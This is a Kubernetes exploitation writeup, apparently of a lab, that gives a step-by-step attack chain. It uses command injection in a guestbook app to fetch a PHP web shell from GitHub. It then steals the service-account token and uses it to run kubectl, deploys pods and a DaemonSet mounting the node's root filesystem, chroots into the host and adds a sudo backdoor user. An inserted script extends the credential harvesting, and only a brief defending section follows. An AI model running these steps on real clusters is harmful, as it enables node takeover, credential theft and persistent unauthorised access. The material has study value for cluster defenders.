[ Home ] [ Writeups ] [ Articles ] [ Cheatsheets ] [ CVE ] [ EOF ]


.:: [KUBERNETES] Exploitation 1 ::.
Title : [KUBERNETES] Exploitation 1
Author : Cabir  
Date : Friday, Sep 13, 2019
Modified : Friday, Sep 13, 2019
Reading time: 1 minute and 8 seconds.

-=[Privilege escalation with malicious pod]=-

# Find Vulnerability

The guestbook stores whatever key/value pair it is given. A harmless key first, to confirm the `set` command works:

http://10.23.58.40:31600/guestbook.php?cmd=set&key=message&value=test

Setting the `command` key makes the frontend run its value, so a crafted value fetches a PHP web shell next to guestbook.php:

http://10.23.58.40:31600/guestbook.php?cmd=set&key=command&value=curl%20https://raw.githubusercontent.com/artyuum/Simple-PHP-Web-Shell/master/index.php%20--output%20shell.php

# Download WebShell with RCE

curl https://raw.githubusercontent.com/artyuum/Simple-PHP-Web-Shell/master/index.php --output shell.php

(The raw file URL is needed; fetching the repository page itself only returns GitHub's HTML.)

# Collect Data

cat /run/secrets/kubernetes.io/serviceaccount/ca.crt
cat /run/secrets/kubernetes.io/serviceaccount/token
cat /run/secrets/kubernetes.io/serviceaccount/namespace

# List pods

./kubectl --token=`cat jwt.txt` --certificate-authority=ca.crt --server=https://10.23.58.40:6443 get pods

# Check if I have permission to exec into pods

./kubectl --token=`cat jwt.txt` --certificate-authority=ca.crt --server=https://10.23.58.40:6443 auth can-i create pods/exec

(`exec` is not an RBAC verb: `kubectl exec` needs the `create` verb on the `pods/exec` subresource, which is what this check asks for. A `*` verb on pods, as in the lab, also answers "yes".)

# Exec an interactive shell in the pods

./kubectl --token=`cat jwt.txt` --certificate-authority=ca.crt --server=https://10.23.58.40:6443 exec -it frontend-586dd8d476-cb8nc -- /bin/bash

# Download kubectl binary:

curl -LO https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl

# Prompt Color: (User Friendly)

PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '

# Export Token in $TOKEN:

export TOKEN=`cat /run/secrets/kubernetes.io/serviceaccount/token`

# Setup alias:

alias kubectl="/data/kubectl --token=$TOKEN --certificate-authority=/run/secrets/kubernetes.io/serviceaccount/ca.crt --server=https://10.23.58.40:6443"
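The credential harvesting and kubectl setup above (collect the three mounted files, export the token, wrap kubectl), as an added shell example that is not part of the original writeup. Beyond the writeup's steps it decodes the token's JWT payload (base64url, no signature check) so you know which service account and namespace you are acting as before touching the API, and asks the API server for the full permission list instead of one `can-i` at a time. The mount path and API server address are the writeup's; the sample token at the bottom is constructed with a fake signature so the decoding part runs offline.

```shell
#!/bin/sh
# Added example, not from the original writeup. Run inside a compromised pod
# (or anywhere the three files were copied to).
# Assumptions: SA_DIR is the default token mount, API_SERVER is the writeup's
# kube-apiserver; SAMPLE_TOKEN below is a constructed JWT with a fake signature.

SA_DIR="${SA_DIR:-/run/secrets/kubernetes.io/serviceaccount}"
API_SERVER="${API_SERVER:-https://10.23.58.40:6443}"

# Show the three files the writeup collects (ca.crt, token, namespace).
show_creds() {
  for f in ca.crt token namespace; do
    printf '== %s ==\n' "$SA_DIR/$f"
    cat "$SA_DIR/$f"; echo
  done
}

# JWT segments are base64url without padding; coreutils base64 wants the
# standard alphabet with padding, so convert the alphabet and restore '='.
b64url_decode() {
  s=$(printf '%s' "$1" | tr '_-' '/+')
  case $(( ${#s} % 4 )) in
    2) s="${s}==" ;;
    3) s="${s}=" ;;
  esac
  printf '%s' "$s" | base64 -d
}

# Print the JSON payload (second dot-separated segment). No signature check:
# we only want to read what the token says about itself.
jwt_payload() {
  b64url_decode "$(printf '%s' "$1" | cut -d. -f2)"
}

# Extract one string-valued claim, e.g.: jwt_claim "$TOKEN" sub
jwt_claim() {
  jwt_payload "$1" | sed -n "s|.*\"$2\":\"\([^\"]*\)\".*|\1|p"
}

# "namespace/serviceaccount" the token was minted for.
sa_identity() {
  ns=$(jwt_claim "$1" kubernetes.io/serviceaccount/namespace)
  name=$(jwt_claim "$1" kubernetes.io/serviceaccount/service-account.name)
  printf '%s/%s\n' "$ns" "$name"
}

# kubectl with the harvested credentials: same effect as the writeup's alias,
# but the token is read on each call instead of sitting in the environment.
kube() {
  kubectl --token="$(cat "$SA_DIR/token")" \
          --certificate-authority="$SA_DIR/ca.crt" \
          --server="$API_SERVER" "$@"
}

# Everything this account may do in its namespace. Look for create on
# pods/exec, pods and daemonsets.apps, or a '*' verb: that is what the
# hostPath pod / DaemonSet attack in this writeup needs.
enumerate_perms() {
  kube auth can-i --list -n "$(cat "$SA_DIR/namespace")"
}

# --- constructed sample token, so the decoding part runs offline ---
b64url_encode() { printf '%s' "$1" | base64 | tr -d '\n=' | tr '/+' '_-'; }
SAMPLE_TOKEN="$(b64url_encode '{"alg":"RS256","typ":"JWT"}').$(b64url_encode '{"iss":"kubernetes/serviceaccount","kubernetes.io/serviceaccount/namespace":"default","kubernetes.io/serviceaccount/service-account.name":"default","sub":"system:serviceaccount:default:default"}').fake-signature"

printf 'sample token belongs to: %s\n' "$(sa_identity "$SAMPLE_TOKEN")"
```

In a real pod, replace `SAMPLE_TOKEN` with `$(cat "$SA_DIR/token")`; `sa_identity` tells you whether you hold the namespace's `default` account or something more interesting before you spend API calls, and `enumerate_perms` replaces guessing verbs one `can-i` at a time.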

# Create a malicious pod that mounts the node's root filesystem (hostPath /, read/write)

apiVersion: v1
kind: Pod
metadata:
  name: attack-pod
  namespace: default
spec:
  containers:
  - image: janeczku/alpine-kubernetes
    imagePullPolicy: IfNotPresent
    name: attack-container
    # added: keep the container running so there is something to exec into
    command: ["/bin/sh", "-c", "while :; do sleep 3600; done"]
    volumeMounts:
    - mountPath: /root
      name: mount-host-root-into-mnt-pods
  volumes:
  - name: mount-host-root-into-mnt-pods
    hostPath:
      path: /

# Use a malicious DaemonSet to get the same access on every node

apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: attack-daemonset
  labels:
    app: attack-daemonset
spec:
  selector:
    matchLabels:
      app: attack-daemonset
  template:
    metadata:
      labels:
        app: attack-daemonset
    spec:
      containers:
      - name: alpine-attack
        image: janeczku/alpine-kubernetes
        # added: keep the container running so there is something to exec into
        command: ["/bin/sh", "-c", "while :; do sleep 3600; done"]
        volumeMounts:
        - mountPath: /root
          name: mount-host-root-into-mnt-pods
      volumes:
      - name: mount-host-root-into-mnt-pods
        hostPath:
          path: /

# Exec a shell in the attack-pod

./kubectl --token=`cat jwt.txt` --certificate-authority=ca.crt --server=https://10.23.58.40:6443 exec -it attack-pod -- /bin/sh

# Chroot host file system

chroot /root /bin/bash

# Add a new user to ssh into the node

adduser owned
adduser owned sudo

(Both run inside the chroot; the second adds the new user to the node's sudo group.)

# Retrieve host IP

cat /root/etc/network/interfaces

# KVM uses ens3

auto ens3
iface ens3 inet static
    address 10.23.58.40        <---- node IP
    netmask 255.255.255.0
    gateway 10.23.58.2
    dns-nameservers 10.23.58.2

# Connect to ssh to the host (Node)

ssh owned@[node-ip]

# Defending

1- Create a dedicated service account for redis
2- Create a Role that only allows get on pods
3- Create a RoleBinding that gives the redis service account that Role (and nothing more)
4- Restart all redis pods so they pick up the new service account and its token

# Sources

InGuardians - Bust-A-Kube

